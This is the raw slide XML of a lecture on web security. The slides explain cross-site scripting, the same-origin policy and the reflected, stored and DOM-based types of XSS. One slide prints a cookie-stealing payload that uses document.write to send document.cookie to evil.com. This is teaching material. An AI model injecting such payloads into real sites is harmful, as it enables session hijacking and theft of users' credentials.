          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr"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sz="2250" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.write</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>="http://evil.com/c.jpg?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'"&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="321457">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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endParaRPr sz="2250" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>DOM API for cookie access (</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Often, the attacker's goal is to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> this property</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Why?</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Exfiltration is restricted by SOP...somewhat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Suppose you click a link directing to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>JS from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> cannot read cookies for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>bofa.com</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>What about injecting code?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>If the attacker can somehow add code into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>bofa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>, the reading and exporting cookies is easy (see above)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2455530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7">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">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417">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7">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">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7">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">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7">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">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7">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41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Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS refers to running code from an untrusted origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually a result of a document integrity violation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Documents are compositions of trusted, developer-specified objects and untrusted input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allowing user input to be interpreted as document structure (i.e., elements) can lead to malicious code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typical goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal authentication credentials (session IDs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or more targeted unauthorized actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2786209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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected (Type 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious code is embedded into a crafted hyperlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious code gets included into webpage rendered by visiting the hyperlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored (Type 2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker submits malicious code to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server app persists malicious code to storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim accesses webpage that includes stored code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM-based (Type 3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Purely client-side injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="552177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Website, Type 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="1682685"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose we have a search site, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.websearch.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.websearch.com/search?q=Christo+Wilson</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567543" y="3893976"/>
            <a:ext cx="8870302" cy="27245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ectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1573763" y="3906415"/>
            <a:ext cx="8857862" cy="6407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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526972" y="4027713"/>
            <a:ext cx="3396342" cy="3981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23314" y="4027713"/>
            <a:ext cx="435429" cy="398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10613" y="4881178"/>
            <a:ext cx="3506986" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Results for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Christo Wilson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1710613" y="5544816"/>
            <a:ext cx="5517921" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Christo Wilson – Professor at Northeastern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.ccs.neu.edu/home/cbw/index.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7588898" y="2666967"/>
            <a:ext cx="2649894" cy="7526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44626" y="4827522"/>
            <a:ext cx="2136501" cy="5689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711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Website, Type 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248817" y="2414246"/>
            <a:ext cx="11694366" cy="675591"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
